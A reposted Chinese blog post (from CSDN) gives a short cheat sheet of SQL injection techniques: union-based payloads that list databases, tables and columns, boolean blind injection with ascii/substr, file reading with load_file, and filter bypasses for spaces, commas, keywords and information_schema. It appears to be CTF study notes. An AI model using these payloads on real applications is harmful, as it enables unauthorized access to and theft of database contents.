首页 最新 热门 推荐

  • 首页
  • 最新
  • 热门
  • 推荐

SQL注入总结

  • 23-10-06 09:22
  • 2508
  • 7464
blog.csdn.net

0x00 前言

简单的总结一下SQL注入的内容

0x01 常规注入

通过特殊字符测试闭合,通常使用的闭合方式有' " ') ")等,当然也有一种可能是数字型,一般就靠试

1.判断字段

a' union select 1,2,3 #
  • 1

2.执行基础内容

a' union select 1,database(),3  #
  • 1

3.查表

a' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database();#
  • 1

4.查列

a' union select table_name,column_name from information_schema.columns where table_name='users'#
  • 1

5.查看具体数据

a' union select 1,falg,3 from web2.flag#
  • 1

获取用户

select user()
  • 1

获取数据库

select database()
  • 1

读取文件

load_file("")
  • 1

0x02 盲注

1.布尔盲注

1.1 ascii

ascii(substr(database(),1,1))>1
  • 1

0x03 绕过

1.空格绕过

空格可以通过/**/进行绕过
可以通过//进行绕过

2.逗号绕过

ascii(substr((database()) from 1 for 1))>1#
  • 1

3. and 绕过

and=&& or=|| xor=| not=!
  • 1

4.information_schema.tables绕过

可以通过 这种方式进行绕过

information_schema.`tables`
  • 1

5. 无列名注入

会将想要查询的内容变成一列进行列出

union select group_concat(b) from (select 1,2,3 as b union select  * from a)l #
  • 1
注:本文转载自blog.csdn.net的Wcbddd的文章"https://blog.csdn.net/HAI_WD/article/details/132136162"。版权归原作者所有,此博客不拥有其著作权,亦不承担相应法律责任。如有侵权,请联系我们删除。
复制链接
复制链接
相关推荐
发表评论
登录后才能发表评论和回复 注册

/ 登录

评论记录:

未查询到任何数据!
回复评论:

分类栏目

后端 (14832) 前端 (14280) 移动开发 (3760) 编程语言 (3851) Java (3904) Python (3298) 人工智能 (10119) AIGC (2810) 大数据 (3499) 数据库 (3945) 数据结构与算法 (3757) 音视频 (2669) 云原生 (3145) 云平台 (2965) 前沿技术 (2993) 开源 (2160) 小程序 (2860) 运维 (2533) 服务器 (2698) 操作系统 (2325) 硬件开发 (2491) 嵌入式 (2955) 微软技术 (2769) 软件工程 (2056) 测试 (2865) 网络空间安全 (2948) 网络与通信 (2797) 用户体验设计 (2592) 学习和成长 (2593) 搜索 (2744) 开发工具 (7108) 游戏 (2829) HarmonyOS (2935) 区块链 (2782) 数学 (3112) 3C硬件 (2759) 资讯 (2909) Android (4709) iOS (1850) 代码人生 (3043) 阅读 (2841)

热门文章

101
推荐
关于我们 隐私政策 免责声明 联系我们
Copyright © 2020-2025 蚁人论坛 (iYenn.com) All Rights Reserved.
Scroll to Top